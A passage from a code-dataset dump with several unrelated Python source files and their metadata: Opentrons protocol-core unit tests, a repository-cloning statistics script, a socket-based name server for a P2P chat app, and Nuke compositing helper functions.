).then_return(\n LoadedModule.construct(id=\"abc123\") # type: ignore[call-arg]\n )\n decoy.when(mock_engine_client.state.labware.get_id_by_module(\"abc123\")).then_raise(\n LabwareNotLoadedOnModuleError(\"oh no\")\n )\n\n assert subject.get_slot_item(DeckSlotName.SLOT_1) is result\n assert subject.get_labware_on_module(result) is None\n\n\n@pytest.mark.parametrize(\n (\"requested_model\", \"engine_model\"),\n [\n (\n ThermocyclerModuleModel.THERMOCYCLER_V1,\n EngineModuleModel.THERMOCYCLER_MODULE_V1,\n ),\n (\n ThermocyclerModuleModel.THERMOCYCLER_V2,\n EngineModuleModel.THERMOCYCLER_MODULE_V2,\n ),\n ],\n)\ndef test_load_module_thermocycler_with_no_location(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n mock_sync_hardware_api: SyncHardwareAPI,\n requested_model: ModuleModel,\n engine_model: EngineModuleModel,\n subject: ProtocolCore,\n) -> None:\n \"\"\"It should issue a load module engine command with location at 7.\"\"\"\n definition = ModuleDefinition.construct() # type: ignore[call-arg]\n\n mock_hw_mod = decoy.mock(cls=AbstractModule)\n decoy.when(mock_hw_mod.device_info).then_return({\"serial\": \"xyz789\"})\n decoy.when(mock_sync_hardware_api.attached_modules).then_return([mock_hw_mod])\n\n decoy.when(\n mock_engine_client.load_module(\n model=engine_model,\n location=DeckSlotLocation(slotName=DeckSlotName.SLOT_7),\n )\n ).then_return(\n commands.LoadModuleResult(\n moduleId=\"abc123\",\n definition=definition,\n model=engine_model,\n serialNumber=\"xyz789\",\n )\n )\n\n result = subject.load_module(\n model=requested_model,\n deck_slot=None,\n configuration=None,\n )\n\n decoy.verify(\n deck_conflict.check(\n engine_state=mock_engine_client.state,\n existing_labware_ids=[\"fixed-trash-123\"],\n existing_module_ids=[],\n new_module_id=\"abc123\",\n )\n )\n\n assert isinstance(result, ThermocyclerModuleCore)\n assert result.module_id == \"abc123\"\n\n\n@pytest.mark.parametrize(\n \"requested_model\",\n [\n HeaterShakerModuleModel.HEATER_SHAKER_V1,\n 
MagneticModuleModel.MAGNETIC_V1,\n MagneticModuleModel.MAGNETIC_V2,\n TemperatureModuleModel.TEMPERATURE_V1,\n TemperatureModuleModel.TEMPERATURE_V2,\n ],\n)\ndef test_load_module_no_location(\n requested_model: ModuleModel, subject: ProtocolCore\n) -> None:\n \"\"\"Should raise an InvalidModuleLocationError exception.\"\"\"\n with pytest.raises(InvalidModuleLocationError):\n subject.load_module(model=requested_model, deck_slot=None, configuration=None)\n\n\n@pytest.mark.parametrize(\"message\", [None, \"Hello, world!\", \"\"])\ndef test_pause(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n subject: ProtocolCore,\n message: Optional[str],\n) -> None:\n \"\"\"It should issue a waitForResume command.\"\"\"\n subject.pause(msg=message)\n decoy.verify(mock_engine_client.wait_for_resume(message=message))\n\n\n@pytest.mark.parametrize(\"seconds\", [0.0, -1.23, 1.23])\n@pytest.mark.parametrize(\"message\", [None, \"Hello, world!\", \"\"])\ndef test_delay(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n subject: ProtocolCore,\n seconds: float,\n message: Optional[str],\n) -> None:\n \"\"\"It should issue a waitForDuration command.\"\"\"\n subject.delay(seconds=seconds, msg=message)\n decoy.verify(mock_engine_client.wait_for_duration(seconds=seconds, message=message))\n\n\ndef test_comment(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n subject: ProtocolCore,\n) -> None:\n \"\"\"It should issue a comment command.\"\"\"\n subject.comment(\"Hello, world!\")\n decoy.verify(mock_engine_client.comment(\"Hello, world!\"))\n\n\ndef test_home(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n subject: ProtocolCore,\n) -> None:\n \"\"\"It should home all axes.\"\"\"\n subject.home()\n decoy.verify(mock_engine_client.home(axes=None), times=1)\n\n\ndef test_is_simulating(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n subject: ProtocolCore,\n) -> None:\n \"\"\"It should return if simulating.\"\"\"\n decoy.when(mock_engine_client.state.config.ignore_pause).then_return(True)\n assert subject.is_simulating()\n\n\ndef test_set_rail_lights(\n decoy: Decoy, mock_engine_client: EngineClient, subject: ProtocolCore\n) -> None:\n \"\"\"It should verify a call to sync client.\"\"\"\n subject.set_rail_lights(on=True)\n decoy.verify(mock_engine_client.set_rail_lights(on=True))\n\n subject.set_rail_lights(on=False)\n decoy.verify(mock_engine_client.set_rail_lights(on=False))\n\n\ndef test_get_rail_lights(\n decoy: Decoy, mock_sync_hardware_api: SyncHardwareAPI, subject: ProtocolCore\n) -> None:\n \"\"\"It should get rails light state.\"\"\"\n decoy.when(mock_sync_hardware_api.get_lights()).then_return({\"rails\": True})\n\n result = subject.get_rail_lights_on()\n assert result is True\n\n\ndef test_get_deck_definition(\n decoy: Decoy, mock_engine_client: EngineClient, subject: ProtocolCore\n) -> None:\n \"\"\"It should return the loaded deck definition from engine state.\"\"\"\n deck_definition = cast(DeckDefinitionV3, {\"schemaVersion\": \"3\"})\n\n decoy.when(mock_engine_client.state.labware.get_deck_definition()).then_return(\n deck_definition\n )\n\n result = subject.get_deck_definition()\n\n assert result == deck_definition\n\n\ndef test_get_slot_center(\n decoy: Decoy, mock_engine_client: EngineClient, subject: ProtocolCore\n) -> None:\n \"\"\"It should return a slot center from engine state.\"\"\"\n decoy.when(\n mock_engine_client.state.labware.get_slot_center_position(DeckSlotName.SLOT_2)\n ).then_return(Point(1, 2, 3))\n\n result = subject.get_slot_center(DeckSlotName.SLOT_2)\n\n 
assert result == Point(1, 2, 3)\n\n\ndef test_get_highest_z(\n decoy: Decoy, mock_engine_client: EngineClient, subject: ProtocolCore\n) -> None:\n \"\"\"It should return a slot center from engine state.\"\"\"\n decoy.when(\n mock_engine_client.state.geometry.get_all_labware_highest_z()\n ).then_return(9001)\n\n result = subject.get_highest_z()\n\n assert result == 9001\n\n\ndef test_add_liquid(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n subject: ProtocolCore,\n) -> None:\n \"\"\"It should return the created liquid.\"\"\"\n liquid = PE_Liquid.construct(\n id=\"water-id\",\n displayName=\"water\",\n description=\"water desc\",\n displayColor=HexColor(__root__=\"#fff\"),\n )\n\n expected_result = Liquid(\n _id=\"water-id\",\n name=\"water\",\n description=\"water desc\",\n display_color=\"#fff\",\n )\n\n decoy.when(\n mock_engine_client.add_liquid(\n name=\"water\", color=\"#fff\", description=\"water desc\"\n )\n ).then_return(liquid)\n\n result = subject.define_liquid(\n name=\"water\", description=\"water desc\", display_color=\"#fff\"\n )\n\n assert result == expected_result\n","repo_name":"busing/opentrons","sub_path":"api/tests/opentrons/protocol_api/core/engine/test_protocol_core.py","file_name":"test_protocol_core.py","file_ext":"py","file_size_in_byte":23740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"45"} +{"seq_id":"26340279323","text":"import pandas as pd\nimport glob\nimport sys\nimport os\nimport json\nimport subprocess\nimport time\n\ndef codechecker(filename, tmpdir, pullcode=True, verbose=True):\n\tdf = pd.read_csv(filename, names=[\"id\", \"fqid\", \"vendor\", \"deployments\", \"tags\", \"description\", \"url\", \"caps\"])\n\n\turllist = list(df[\"url\"])\n\tnamelist = list(df[\"id\"])\n\thascloned = {}\n\thasclonednow = {}\n\tfolders = {}\n\tnamedfolders = {}\n\tneedscopy = {}\n\tneedscopyurl = {}\n\tsuccess = 0\n\tfailure = 0\n\tunpulled = 0\n\tdupe = 0\n\totherurls = {}\n\tnourls = 0\n\tstatsnew = 0\n\tstatsupdated = 0\n\tprevtime = 0\n\n\tif pullcode:\n\t\tif os.path.isfile(\"codecheckerrepos.json\"):\n\t\t\tf = open(\"codecheckerrepos.json\")\n\t\t\thascloned = json.load(f)\n\t\tif os.path.isfile(\"codecheckerfolders.json\"):\n\t\t\tf = open(\"codecheckerfolders.json\")\n\t\t\tfolders = json.load(f)\n\t\tif os.path.isfile(\"codecheckernamedfolders.json\"):\n\t\t\tf = open(\"codecheckernamedfolders.json\")\n\t\t\tnamedfolders = json.load(f)\n\t\tif os.path.isfile(\"_codestamp\"):\n\t\t\tf = open(\"_codestamp\")\n\t\t\tprevtime = int(f.read().strip())\n\t\t\tprint(\"last run {}s ago\".format(int(time.time()) - prevtime))\n\t\tf = open(\"_codestamp\", \"w\")\n\t\tprint(str(int(time.time())), file=f)\n\t\tf.close()\n\n\tfor i, urlname in enumerate(zip(urllist, namelist)):\n\t\turl, name = urlname\n\t\tipos = len(hascloned) + 1\n\t\tif \"github.com\" in str(url):\n\t\t\turlstem = \"/\".join(url.split(\"/\")[:5])\n\t\t\turlpath = \"/\".join(url.split(\"/\")[5:])\n\t\t\tif urlstem in hasclonednow:\n\t\t\t\tipos = hasclonednow[urlstem]\n\t\t\t\tprint(\"REPO reuse {} ({})\".format(urlstem, ipos))\n\t\t\t\tdupe += 1\n\t\t\telif pullcode:\n\t\t\t\tif urlstem in hascloned:\n\t\t\t\t\tipos = hascloned[urlstem]\n\t\t\t\tif os.path.isdir(\"{}/_codechecker/{}\".format(tmpdir, ipos)):\n\t\t\t\t\tprint(\"REPO clone-update {}... 
({})\".format(urlstem, ipos))\n\t\t\t\t\tif time.time() - prevtime > 3600:\n\t\t\t\t\t\torigdir = os.getcwd()\n\t\t\t\t\t\tos.chdir(\"{}/_codechecker/{}\".format(tmpdir, ipos))\n\t\t\t\t\t\tos.system(\"git -c core.askpass=true fetch -q\")\n\t\t\t\t\t\tp = subprocess.run(\"git diff origin/HEAD\", shell=True, stdout=subprocess.PIPE)\n\t\t\t\t\t\tif p.stdout:\n\t\t\t\t\t\t\tstatsupdated += 1\n\t\t\t\t\t\t\tos.system(\"git merge origin/HEAD\")\n\t\t\t\t\t\t\tneedscopy[urlstem] = True\n\t\t\t\t\t\tos.chdir(origdir)\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\" (skip actual update check due to short succession)\")\n\t\t\t\t\thascloned[urlstem] = ipos\n\t\t\t\t\thasclonednow[urlstem] = ipos\n\t\t\t\t\tsuccess += 1\n\t\t\t\telse:\n\t\t\t\t\tprint(\"REPO clone {}... ({})\".format(urlstem, ipos))\n\t\t\t\t\tos.makedirs(\"{}/_codechecker\".format(tmpdir), exist_ok=True)\n\t\t\t\t\tret = os.system(\"git -c core.askpass=true clone -q {} {}/_codechecker/{}\".format(urlstem, tmpdir, ipos))\n\t\t\t\t\tif ret:\n\t\t\t\t\t\tprint(\"!!!! ERROR cloning\")\n\t\t\t\t\t\tfailure += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\telse:\n\t\t\t\t\t\tsuccess += 1\n\t\t\t\t\t\thascloned[urlstem] = ipos\n\t\t\t\t\t\thasclonednow[urlstem] = ipos\n\t\t\t\t\t\tneedscopy[urlstem] = True\n\t\t\t\t\t\tstatsnew += 1\n\t\t\telse:\n\t\t\t\tunpulled += 1\n\t\t\t\thascloned[urlstem] = ipos\n\t\t\t\thasclonednow[urlstem] = ipos\n\n\t\t\tif not url in folders:\n\t\t\t\tfolders[url] = str(ipos) + \"-\" + str(len(folders) + 1)\n\t\t\tif not name in namedfolders:\n\t\t\t\tnamedfolders[name] = folders[url]\n\t\t\tif pullcode:\n\t\t\t\tfpos = folders[url]\n\t\t\t\tif not os.path.isdir(\"{}/_codefolders/{}\".format(tmpdir, fpos)):\n\t\t\t\t\tneedscopy[urlstem] = True\n\t\t\t\t\tif url in needscopyurl:\n\t\t\t\t\t\tdel needscopyurl[url]\n\t\t\t\tif urlstem in needscopy and needscopy[urlstem] and not url in needscopyurl:\n\t\t\t\t\tneedscopyurl[url] = False\n\t\t\t\t\tprint(\" DIR produce folder {}\".format(fpos))\n\t\t\t\t\tos.makedirs(\"{}/_codefolders\".format(tmpdir), exist_ok=True)\n\t\t\t\t\torigdir = None\n\t\t\t\t\tif urlpath.startswith(\"tree\"):\n\t\t\t\t\t\ttree, treename, *rest = urlpath.split(\"/\")\n\t\t\t\t\t\turlpath = \"/\".join(rest)\n\t\t\t\t\t\torigdir = os.getcwd()\n\t\t\t\t\t\tos.chdir(\"{}/_codechecker/{}\".format(tmpdir, hascloned[urlstem]))\n\t\t\t\t\t\tos.system(\"git checkout -q {}\".format(treename))\n\t\t\t\t\t\tos.chdir(origdir)\n\t\t\t\t\tos.system(\"rm -rf {}/_codefolders/{}\".format(tmpdir, fpos))\n\t\t\t\t\tos.system(\"cp -r {}/_codechecker/{}/{} {}/_codefolders/{}\".format(tmpdir, hascloned[urlstem], urlpath, tmpdir, fpos))\n\t\t\t\t\tos.system(\"rm -rf {}/_codefolders/{}/.git\".format(tmpdir, fpos))\n\t\t\t\telse:\n\t\t\t\t\tprint(\" DIR reuse existing folder {}\".format(fpos))\n\t\t\t#if origdir:\n\t\t\t#\tos.chdir(\"_codechecker/{}\".format(hascloned[urlstem]))\n\t\t\t#\tos.system(\"git checkout master\") # origin/HEAD?\n\t\t\t#\tos.chdir(origdir)\n\t\telse:\n\t\t\tif pd.isnull(url):\n\t\t\t\tnourls += 1\n\t\t\telse:\n\t\t\t\turlstem = url\n\t\t\t\tif \"/\" in url:\n\t\t\t\t\turlstem = url.split(\"/\")[2]\n\t\t\t\totherurls[urlstem] = otherurls.get(urlstem, 0) + 1\n\n\tif pullcode:\n\t\tf = open(\"codecheckerrepos.json\", \"w\")\n\t\tjson.dump(hascloned, f, sort_keys=True)\n\t\tf.close()\n\t\tf = open(\"codecheckerfolders.json\", \"w\")\n\t\tjson.dump(folders, f, sort_keys=True)\n\t\tf.close()\n\t\tf = open(\"codecheckernamedfolders.json\", \"w\")\n\t\tjson.dump(namedfolders, f, 
sort_keys=True)\n\t\tf.close()\n\n\tprint(\"failures {} + success {} = unique github repos {} + dupes {} = github {} + other {} + none {} = total {}\".format(failure, success, failure + success + unpulled, dupe, failure + success + unpulled + dupe, len(urllist) - failure - success - unpulled - dupe - nourls, nourls, len(urllist)))\n\tprint(\"others\", otherurls)\n\n\tif pullcode:\n\t\tprint(\"stats: new {}, updated {}\".format(statsnew, statsupdated))\n\n\t\tif os.path.isfile(\"codecheckerstats.csv\"):\n\t\t\tf = open(\"codecheckerstats.csv\", \"a\")\n\t\telse:\n\t\t\tf = open(\"codecheckerstats.csv\", \"w\")\n\t\t\tprint(\"#date,new,updated\", file=f)\n\t\tdate = filename.replace(\"autostats/\", \"\").replace(\"autocontents-\", \"\").replace(\".csv\", \"\")\n\t\tprint(\"{},{},{}\".format(date, statsnew, statsupdated), file=f)\n\t\tf.close()\n\n\treturn len(urllist), failure, success, unpulled, dupe, nourls\n\ntmpdir = \".\"\nstats = False\nif len(sys.argv) == 2:\n\ttmpdir = sys.argv[1]\n\tif sys.argv[1] == \"--stats\":\n\t\tstats = True\n\nif not os.path.isdir(\"autostats\"):\n\tprint(\"Error: must be run in the parent directory of 'autostats'.\", file=sys.stderr)\n\tsys.exit(-1)\n\nfilenames = glob.glob(\"autostats/autocontents-*.csv\")\nfilenames.sort()\n\nif not stats:\n\tfilename = filenames[-1]\n\ttotal, failure, success, unpulled, dupe, nourls = codechecker(filename, tmpdir)\n\n\tadd = False\n\tif not os.path.isfile(\"codecheckerpull.csv\"):\n\t\tadd = True\n\n\tf = open(\"codecheckerpull.csv\", \"a\")\n\tif add:\n\t\tprint(\"#date,total,failure,success,github-unique,github-dupe,other,none\", file=f)\n\tdate = filename.replace(\"autostats/\", \"\").replace(\"autocontents-\", \"\").replace(\".csv\", \"\")\n\tother = total - failure - success - unpulled - dupe - nourls\n\tprint(\"{},{},{},{},{},{},{},{}\".format(date, total, failure, success, failure + success + unpulled, failure + success + unpulled + dupe, other, nourls), file=f)\n\tf.close()\nelse:\n\tf = open(\"codechecker.csv\", \"w\")\n\tprint(\"#date,total,github-unique,github-dupe,other,none\", file=f)\n\tfor filename in filenames:\n\t\tdate = filename.replace(\"autostats/\", \"\").replace(\"autocontents-\", \"\").replace(\".csv\", \"\")\n\t\ttotal, fign, sign, unpulled, dupe, nourls = codechecker(filename, None, False)\n\t\tother = total - unpulled - dupe - nourls\n\t\tprint(\"{},{},{},{},{},{}\".format(date, total, unpulled, dupe, other, nourls), file=f)\n\tf.close()\n","repo_name":"serviceprototypinglab/aws-sar-analysis","sub_path":"codechecker.py","file_name":"codechecker.py","file_ext":"py","file_size_in_byte":6970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"277899739","text":"import socket\nimport time\nimport os\nimport json\nfrom select import select\nfrom protocols import *\n\n# path to checkpoint and log files\nCKPT = 'catalog.ckpt'\nLOG = 'catalog.log'\n# maximum number of logs before checkpoint\nMAX_LOGS = 100\n\n# maximum message size to reach each time in bytes\nMSG_SIZE = 1024\n\n\nclass Catalog:\n '''Catalog of registered users. 
Implemented as a dictionary of dictionaries.'''\n def __init__(self):\n self._catalog = dict()\n\n def add(self, name, address, status, verbose=True, isgroup= False):\n # Add a new user to the catalog or update an existing user's information\n # address is a tuple of (host, port)\n self._catalog[name] = {\n 'address': address,\n 'status': status,\n 'last_update': time.time(),\n 'isgroup': False,\n }\n if isgroup:\n self._catalog[name]['isgroup'] = True\n if verbose:\n host, port = address\n print(\"Registered user {} at {}:{} as {}\".format(name, host, port, status))\n\n def lookup(self, name):\n # Lookup a user's information\n # return the user's dictionary, or None if not found\n return self._catalog.get(name, None)\n \n def items(self):\n # Return an iterator of (name, user) pairs\n return self._catalog.items()\n \n def update_stale(self, verbose=True):\n # Update status of stale users to 'offline' if they haven't been updated in 120 seconds\n ts = time.time()\n updated = []\n for name, user in self._catalog.items():\n if user['isgroup']:\n continue\n if ts - user['last_update'] > 120.0 and user['status'] == 'online':\n self._catalog[name][\"status\"] = 'offline'\n if verbose:\n print(\"Updated stale user {} as offline\".format(name))\n updated.append((name, user['address'], user['status']))\n return updated\n\nclass Checkpoint:\n '''Checkpoint class for periodically saving catalog to disk.'''\n def __init__(self, path):\n self.path = path\n\n def save(self, catalog: Catalog, ts: float):\n # Save catalog to disk by shadowing\n with open(self.path+'.tmp', 'w') as f:\n f.write(str(ts)+'\\n')\n for name, user in catalog.items():\n if isinstance(user['address'], list) or isinstance(user['address'], tuple):\n user['address'] = ' '.join(map(str, user['address']))\n f.write(' '.join([name, user['address'], user['status']])+'\\n')\n f.flush()\n os.sync()\n os.rename(self.path+'.tmp', self.path)\n \n def load(self):\n # Load catalog from disk, returns a catalog object and timestamp\n catalog = Catalog()\n try:\n with open(self.path, 'r') as f:\n ts = float(f.readline().strip())\n for line in f.read().splitlines():\n name, host, port, status = line.split()\n catalog.add(name, (host,port), status, verbose=False)\n except FileNotFoundError:\n ts = 0.0\n return catalog, ts\n\nclass Log:\n '''Log class for recording updates'''\n def __init__(self, path):\n self.path = path\n try:\n self.log = open(self.path, 'r+')\n except FileNotFoundError:\n with open(self.path, 'w+') as f:\n f.write('0.0\\n')\n f.flush()\n os.fsync(f.fileno())\n self.log = open(self.path, 'r+')\n self.length = 0\n \n def playback(self, catalog: Catalog, ckpt_ts: float):\n # playback log file, update catalog, and skip incomplete logs\n # if log is stale, truncate it and return the original catalog\n # else, return new catalog updated with log\n log_ts = float(self.log.readline().strip())\n if log_ts < ckpt_ts:\n # log is stale, truncate it\n self.truncate(ckpt_ts)\n return catalog\n else:\n for line in self.log.read().splitlines():\n try:\n name, host, port, status = line.split()\n catalog.add(name, (host, port), status, verbose=False)\n self.length += 1\n except ValueError:\n # invalid record, skip it\n continue\n return catalog\n\n def append(self, name, address, status) -> int:\n # append a new record to log file\n address = ' '.join(map(str, address))\n self.log.write(' '.join([name, address, status])+'\\n')\n self.log.flush()\n os.sync()\n self.length += 1\n return self.length\n\n def truncate(self, ts):\n # truncate log 
file\n self.log.truncate(0)\n self.log.seek(0)\n # write current timestamp\n self.log.write(str(ts)+'\\n')\n self.log.flush()\n os.sync()\n self.length = 0\n\n\nclass NameServer:\n '''Name server for user discovery.'''\n def __init__(self, host=None, port=0):\n # Initialize catalog from checkpoint file and playback log\n self.catalog = Catalog()\n # Read checkpoint file\n self.ckpt = Checkpoint(CKPT)\n self.catalog, self.ckpt_ts = self.ckpt.load()\n # Read log file\n self.log = Log(LOG)\n self.catalog = self.log.playback(self.catalog, self.ckpt_ts)\n\n # initialize socket\n host = host if host else socket.gethostname()\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s.bind((host, port))\n self.s.listen(5)\n self.host, self.port = self.s.getsockname()\n print(\"Name server listening on {}:{}\".format(self.host, self.port))\n\n # send UDP broadcast to known online users in the catalog\n broadcast = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n package = UDPPackage('NAMESERVER', self.host, self.port, 'address update')\n for name, user in self.catalog.items():\n if user['status'] == 'online':\n ip_addr, port = user['address']\n port = int(port)\n broadcast.sendto(str(package).encode(), (ip_addr, port))\n broadcast.close()\n\n def __del__(self):\n try:\n self.s.close()\n except AttributeError:\n pass\n\n def run(self):\n self.last_update_stale = time.time()\n while True:\n # Update stale users every 120 seconds\n if time.time() - self.last_update_stale > 120.0:\n updated = self.catalog.update_stale()\n self.last_update_stale = time.time()\n # Update log\n for user_info in updated:\n self.log.append(*user_info)\n # Check for new connections\n readable, _, _ = select([self.s], [], [], 0.0)\n if not readable:\n continue\n client, address = self.s.accept()\n client.settimeout(10.0)\n print(\"Connection from {}:{}\".format(address[0], address[1]))\n try:\n sz = client.recv(8)\n if not sz:\n # connection closed by client\n raise ConnectionAbortedError(\"Connection closed by client\")\n length = int.from_bytes(sz, \"big\")\n msg = b''\n while len(msg) < length:\n to_read = length - len(msg)\n msg += client.recv(MSG_SIZE if to_read > MSG_SIZE else to_read)\n except:\n client.close()\n continue\n # Operate on the message\n try:\n msg = json.loads(msg.decode())\n if msg['op'] == 'register':\n # register a new user or update an existing user's information\n self.catalog.add(msg['username'], msg['address'], msg['status'])\n # Update log\n log_length = self.log.append(msg['username'], msg['address'], msg['status'])\n if log_length > MAX_LOGS:\n # Update checkpoint\n save_ts = time.time()\n self.ckpt.save(self.catalog, save_ts)\n self.log.truncate(save_ts)\n res = {'status': 'ok'}\n elif msg['op'] == 'lookup':\n # lookup a user's information\n user = self.catalog.lookup(msg['username'])\n res = user if user else {'status': 'error'}\n elif msg['op'] == 'add_friend':\n from_uname, to_uname = msg['username'], msg['friend']\n try:\n from_host, from_port = self.catalog.lookup(from_uname)['address']\n to_host, to_port = self.catalog.lookup(to_uname)['address']\n except TypeError:\n raise ValueError(\"User {} not found\".format(from_uname))\n # send UDP request to to_uname about from_uname's request to add as a friend\n content = {'username': from_uname, 'host': from_host, 'port': from_port}\n res = self.send_udp('add friend', to_host, to_port, content)\n else:\n raise ValueError(\"Unrecognized request\")\n except (ValueError, KeyError):\n res = {'status': 'error'}\n # Send response\n res = 
json.dumps(res).encode()\n sz = len(res).to_bytes(8, \"big\")\n client.send(sz + res)\n client.close()\n \n def send_udp(self, topic, to_host, to_port, content=None):\n udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n udp_sock.settimeout(20.0)\n from_host, from_port = '', ''\n if topic == 'add friend':\n from_host, from_port = udp_sock.getsockname()\n elif topic == 'address update':\n from_host, from_port = self.host, self.port\n message = {\n 'senderName': 'NAMESERVER',\n 'senderHost': from_host,\n 'senderPort': from_port,\n 'topic': topic,\n }\n if content:\n message['content'] = content\n message = json.dumps(message).encode()\n udp_sock.sendto(message, (to_host, to_port))\n # wait for response\n if topic == 'address update':\n udp_sock.close()\n return\n try:\n response, _ = udp_sock.recvfrom(MSG_SIZE)\n retry_counter = 1\n while not response:\n time.sleep(2**retry_counter)\n print(\"No response from user, retry in {} seconds\".format(2**retry_counter))\n response, _ = udp_sock.recvfrom(MSG_SIZE)\n retry_counter += 1\n if retry_counter > 5:\n print(\"No response. Please try again later.\")\n raise socket.timeout(\"No response from user\")\n response = json.loads(response.decode())\n if response['status'] == 'success':\n res = {'status': 'success'}\n else:\n res = {'status': 'error'}\n except:\n res = {'status': 'error'}\n udp_sock.close()\n return res\n\n\n\nif __name__ == '__main__':\n ns = NameServer()\n ns.run()","repo_name":"DannyTDS/P2P-Chat","sub_path":"NameServer.py","file_name":"NameServer.py","file_ext":"py","file_size_in_byte":11362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"7942145521","text":"import sys\nimport os\nimport threading\nimport time\nimport re\nimport importlib\n\n\nimport nuke\n\n__menus__ = {}\n\n\ndef getScene():\n root_name = nuke.toNode(\"root\").name()\n return root_name\n\n\ndef getRenderOpts():\n # returns a Nuke \"format\" object\n oRenderOpts = nuke.toNode(\"root\").knob(\"format\").value()\n return oRenderOpts\n\n\ndef getSelected():\n sel = nuke.selectedNode().knob(\"name\").value()\n return sel\n\n\ndef getResX():\n oFormat = getRenderOpts()\n ResX = nuke.Format.width(oFormat)\n # note there is also nuke.Format.setWidth(oFormat)\n return ResX\n\n\ndef getResY():\n oFormat = getRenderOpts()\n ResY = nuke.Format.height(oFormat)\n # note there is also nuke.Format.setHeight(oFormat)\n return ResY\n\n\ndef getExtension():\n ext = getSceneFullPath()[getSceneFullPath().find(\".\") :]\n return \".nk\"\n\n\ndef getPixelRatio():\n oFormat = getRenderOpts()\n pixRatio = nuke.Format.pixelAspect(oFormat)\n return pixRatio\n\n\ndef getDeviceAspectRatio():\n # resX/resY?\n return 1\n\n\ndef getStartFrame():\n StartFrame = nuke.toNode(\"root\").knob(\"first_frame\").value()\n return StartFrame\n\n\ndef getEndFrame():\n EndFrame = nuke.toNode(\"root\").knob(\"last_frame\").value()\n return EndFrame\n\n\ndef getStepBy():\n StepBy = 1\n return StepBy\n\n\ndef getScenePath():\n return os.path.split(getSceneFullPath())[0]\n\n\ndef getSceneFullPath():\n return nuke.toNode(\"root\").knob(\"name\").value()\n\n\ndef getSceneName():\n return os.path.split(getSceneFullPath())[1]\n\n\ndef getSceneCleanName():\n return getSceneName().split(\".\")[0]\n\n\ndef getTimeSliderRange():\n return (getStartFrame(), getEndFrame())\n\n\ndef hasChanged():\n return nuke.Root().modified()\n\n\ndef saveAs(*args):\n args = cleanArgs(args)\n outputFileName = args[0]\n nuke.scriptSaveAs(outputFileName)\n\n\ndef 
setRenderPaths(*args):\n args = cleanArgs(args)\n outPath = args[0]\n selWrites = nuke.selectedNodes(\"Write\")\n\n selWrites.reverse()\n for eachNode in selWrites:\n eachNode.setSelected(False)\n\n for eachNode in selWrites:\n ext = \"exr\"\n if eachNode.knob(\"file\").value():\n match = re.search(\".*\\.(\\w+)\", eachNode.knob(\"file\").value())\n if match:\n ext = match.groups(1)[0]\n print(ext)\n\n eachNode.knob(\"file\").setValue(outPath + r\".%04d.\" + ext)\n eachNode.knob(\"label\").setValue(os.path.basename(os.path.dirname(outPath)))\n\n for eachNode in selWrites:\n eachNode.setSelected(True)\n\n return\n\n\ndef createReadNode(*args):\n args = cleanArgs(args)\n infoDict = args[0]\n readNode = nuke.nodes.Read()\n readNode.knob(\"file\").setValue(infoDict[\"file\"])\n readNode.knob(\"on_error\").setValue(1) # black on missing frames\n readNode.knob(\"first\").setValue(int(infoDict[\"first\"]))\n readNode.knob(\"last\").setValue(int(infoDict[\"last\"]))\n\n return readNode\n\n\ndef getWritePath(*args):\n args = cleanArgs(args)\n eachPass = args[0]\n numsearch = re.search(\".*[\\.|_](\\d+)\\.\", eachPass[\"importFrame\"])\n frameNum = \"0101\"\n if numsearch:\n frameNum = numsearch.group(1)\n return (\n eachPass[\"importFrame\"]\n .replace(frameNum, \"%04d\")\n .replace(\n (\"/\" + eachPass[\"version\"] + \"/\"),\n (\"/\" + eachPass[\"version\"] + eachPass[\"imageTag\"] + \"/\"),\n )\n )\n\n\ndef getNukeFrameNumbers(digits):\n \"\"\"\n return the size of nuke 'frame number variable'\n\n input:\n %04\n ###\n \"\"\"\n if \"#\" in digits:\n return digits.count(\"#\")\n else:\n return int(\"\".join(i for i in digits if i.isdigit()))\n\n\ndef refreshNode(*args):\n args = cleanArgs(args)\n strNode = args[0]\n n = nuke.toNode(strNode)\n x = int(n.knob(\"tile_color\").getValue())\n n.knob(\"tile_color\").setValue(0)\n n.knob(\"tile_color\").setValue(x)\n n.knob(\"file\").setFlag(nuke.INVISIBLE)\n n.knob(\"file\").clearFlag(nuke.INVISIBLE)\n\n\ndef nodePaste(*args):\n args = cleanArgs(args)\n file = args[0]\n nuke.nodePaste(file)\n\n\ndef cleanArgs(args):\n if type(args[0]) == list and len(args) == 1:\n return args[0]\n else:\n return args\n\n\ndef paddingSplit(file_name):\n \"\"\"\n This will break up a sting that describes\n a frame range into component pieces.\n\n input: \n output: ; (int,string,string)\n\n Example:\n print paddingSplit(\"colorbars.%04d.sgi\")\n (4,\"colorbars.\",\".sgi\")\n \"\"\"\n file_name = file_name.strip()\n\n padding = 0\n prefix = file_name\n suffix = None\n\n m1 = re.search(\"^(.+)%(\\d+)d(.+)$\", file_name)\n m2 = re.search(\"^(.+)(#+)(,+)$\", file_name)\n if m1:\n prefix = m1.group(1)\n padding = int(m1.group(2))\n suffix = m1.group(3)\n elif m2:\n prefix = m2.group(1)\n padding = m2.group(2).count(\"#\")\n suffix = m2.group(3)\n return (padding, prefix, suffix)\n\n\ndef reload_lib(mylib):\n importlib.reload(mylib)\n","repo_name":"rjmoggach/nuke-dotnuke","sub_path":"tools/python/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"45"} +{"seq_id":"72355118217","text":"from mercantil import Mercantil\nfrom pessoa import Pessoa\n\n\ndef main():\n global userInput\n \n while True:\n line = input()\n print(f\"${line}\")\n userInput = line.split(\" \")\n\n try:\n menu()\n except Exception as e:\n print(e)\n\n\ndef menu():\n global mercantil\n \n if command(\"end\"):\n 